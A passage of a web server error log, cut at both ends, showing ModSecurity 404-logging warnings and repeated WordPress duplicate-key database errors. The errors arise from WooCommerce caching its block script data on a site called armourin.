equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-style-engine\\",\\"wp-url\\",\\"wp-wordcount\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\
[Tue May 26 16:48:38.800498 2026] [security2:error] [pid 817651:tid 817905] [client 45.13.225.123:36166] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "armourin.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahWBjtlGRCPPN1dS2y26kAAAAQE"]
[Tue May 26 16:48:38.816825 2026] [security2:error] [pid 823496:tid 823644] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBjZa08mrtyBNpA4PbGwAAABA"]
[Tue May 26 16:48:38.923044 2026] [lsapi:warn] [pid 817651:tid 817873] [client 45.13.225.123:36204] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_timeout_woocommerce_blocks_asset_api_script_data_ssl', '1782386318', 'off') ON DUPLICATE KEY UPDATE `option_name` = VALUES(`option_name`), `option_value` = VALUES(`option_value`), `autoload` = VALUES(`autoload`) made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, Automattic\\WooCommerce\\Blocks\\Assets\\Api->update_script_data_cache, set_transient, add_option\n
[Tue May 26 16:48:38.923076 2026] [lsapi:warn] [pid 817651:tid 817873] [client 45.13.225.123:36204] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_woocommerce_blocks_asset_api_script_data_ssl', '{\\"script_data\\":{\\"assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\",\\"version\\":\\"07c2f0675ddd247d2325\\",\\"dependencies\\":[\\"wp-hooks\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-types.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-types.js\\",\\"version\\":\\"bda84b1be3361607d04a\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\",\\"version\\":\\"ca04183222edaf8a26be\\",\\"dependencies\\":[\\"wp-api-fetch\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\",\\"version\\":\\"3b21c127321dcdffaeba\\",\\"dependencies\\":[\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-api-fetch\\",\\"wp-data\\",\\"wp-data-controls\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-notices\\",\\"wp-polyfill\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\",\\"version\\":\\"389607d443f2591c0913\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\",\\"version\\":\\"1c879273bd5c193cad0a\\",\\"dependencies\\":[\\"react\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\",\\"version\\":\\"00ce86264fca4977b16a\\",\\"dependencies\\":[\\"react\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-dom-ready\\",\\"wp-element\\",\\"wp-hooks\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\",\\"version\\":\\"6eb6865831aa5a75475d\\",\\"dependencies\\":[\\"react\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\",\\"version\\":\\"4f21a9f43ea5bfa7f02e\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-data-store\\",\\"wc-blocks-shared-context\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/price-format.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/price-format.js\\",\\"version\\":\\"eb7a7398126f71912b09\\",\\"dependencies\\":[\\"wc-settings\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\",\\"version\\":\\"cbe41c7abb3949767748\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\",\\"version\\":\\"5980872eb77817dd6b18\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-warning\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\",\\"version\\":\\"211abb6906805368a551\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-data-store\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\",\\"version\\":\\"8997b5406dcf18064a4e\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\",\\"version\\":\\"c33101c7e57ca780e0d8\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters.js\\",\\"version\\":\\"07254c2f32c26d21c0ef\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\",\\"version\\":\\"b7ae146ebe7863f9f6b8\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/all-products.js\\",\\"version\\":\\"de63136b925fe4405f95\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-blocks-shared-context\\",\\"wc-blocks-shared-hocs\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-api-fetch\\",\\"wp-autop\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-escape-html\\",\\"wp-hooks\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-style-engine\\",\\"wp-url\\",\\"wp-wordcount\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\
[Tue May 26 16:48:38.923483 2026] [security2:error] [pid 817651:tid 817873] [client 45.13.225.123:36204] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "armourin.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahWBjtlGRCPPN1dS2y26jgAAAOE"]
[Tue May 26 16:48:38.961562 2026] [lsapi:warn] [pid 817651:tid 817865] [client 45.13.225.123:36244] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_timeout_woocommerce_blocks_asset_api_script_data_ssl', '1782386318', 'off') ON DUPLICATE KEY UPDATE `option_name` = VALUES(`option_name`), `option_value` = VALUES(`option_value`), `autoload` = VALUES(`autoload`) made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, Automattic\\WooCommerce\\Blocks\\Assets\\Api->update_script_data_cache, set_transient, add_option\n
[Tue May 26 16:48:38.961596 2026] [lsapi:warn] [pid 817651:tid 817865] [client 45.13.225.123:36244] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_woocommerce_blocks_asset_api_script_data_ssl', '{\\"script_data\\":{\\"assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\",\\"version\\":\\"07c2f0675ddd247d2325\\",\\"dependencies\\":[\\"wp-hooks\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-types.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-types.js\\",\\"version\\":\\"bda84b1be3361607d04a\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\",\\"version\\":\\"ca04183222edaf8a26be\\",\\"dependencies\\":[\\"wp-api-fetch\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\",\\"version\\":\\"3b21c127321dcdffaeba\\",\\"dependencies\\":[\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-api-fetch\\",\\"wp-data\\",\\"wp-data-controls\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-notices\\",\\"wp-polyfill\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\",\\"version\\":\\"389607d443f2591c0913\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\",\\"version\\":\\"1c879273bd5c193cad0a\\",\\"dependencies\\":[\\"react\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\",\\"version\\":\\"00ce86264fca4977b16a\\",\\"dependencies\\":[\\"react\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-dom-ready\\",\\"wp-element\\",\\"wp-hooks\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\",\\"version\\":\\"6eb6865831aa5a75475d\\",\\"dependencies\\":[\\"react\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\",\\"version\\":\\"4f21a9f43ea5bfa7f02e\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-data-store\\",\\"wc-blocks-shared-context\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/price-format.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/price-format.js\\",\\"version\\":\\"eb7a7398126f71912b09\\",\\"dependencies\\":[\\"wc-settings\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\",\\"version\\":\\"cbe41c7abb3949767748\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\",\\"version\\":\\"5980872eb77817dd6b18\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-warning\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\",\\"version\\":\\"211abb6906805368a551\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-data-store\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\",\\"version\\":\\"8997b5406dcf18064a4e\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\",\\"version\\":\\"c33101c7e57ca780e0d8\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters.js\\",\\"version\\":\\"07254c2f32c26d21c0ef\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\",\\"version\\":\\"b7ae146ebe7863f9f6b8\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/all-products.js\\",\\"version\\":\\"de63136b925fe4405f95\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-blocks-shared-context\\",\\"wc-blocks-shared-hocs\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-api-fetch\\",\\"wp-autop\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-escape-html\\",\\"wp-hooks\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-style-engine\\",\\"wp-url\\",\\"wp-wordcount\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\
[Tue May 26 16:48:38.963192 2026] [security2:error] [pid 817651:tid 817865] [client 45.13.225.123:36244] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "armourin.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahWBjtlGRCPPN1dS2y26jwAAANk"]
[Tue May 26 16:48:38.964445 2026] [lsapi:warn] [pid 817651:tid 817863] [client 45.13.225.123:36252] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_timeout_woocommerce_blocks_asset_api_script_data_ssl', '1782386318', 'off') ON DUPLICATE KEY UPDATE `option_name` = VALUES(`option_name`), `option_value` = VALUES(`option_value`), `autoload` = VALUES(`autoload`) made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, Automattic\\WooCommerce\\Blocks\\Assets\\Api->update_script_data_cache, set_transient, add_option\n
[Tue May 26 16:48:38.965043 2026] [lsapi:warn] [pid 817651:tid 817863] [client 45.13.225.123:36252] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_woocommerce_blocks_asset_api_script_data_ssl', '{\\"script_data\\":{\\"assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\",\\"version\\":\\"07c2f0675ddd247d2325\\",\\"dependencies\\":[\\"wp-hooks\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-types.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-types.js\\",\\"version\\":\\"bda84b1be3361607d04a\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\",\\"version\\":\\"ca04183222edaf8a26be\\",\\"dependencies\\":[\\"wp-api-fetch\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\",\\"version\\":\\"3b21c127321dcdffaeba\\",\\"dependencies\\":[\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-api-fetch\\",\\"wp-data\\",\\"wp-data-controls\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-notices\\",\\"wp-polyfill\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\",\\"version\\":\\"389607d443f2591c0913\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\",\\"version\\":\\"1c879273bd5c193cad0a\\",\\"dependencies\\":[\\"react\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\",\\"version\\":\\"00ce86264fca4977b16a\\",\\"dependencies\\":[\\"react\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-dom-ready\\",\\"wp-element\\",\\"wp-hooks\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\",\\"version\\":\\"6eb6865831aa5a75475d\\",\\"dependencies\\":[\\"react\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\",\\"version\\":\\"4f21a9f43ea5bfa7f02e\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-data-store\\",\\"wc-blocks-shared-context\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/price-format.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/price-format.js\\",\\"version\\":\\"eb7a7398126f71912b09\\",\\"dependencies\\":[\\"wc-settings\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\",\\"version\\":\\"cbe41c7abb3949767748\\",\\"dependencies\\":[\\"wp-pol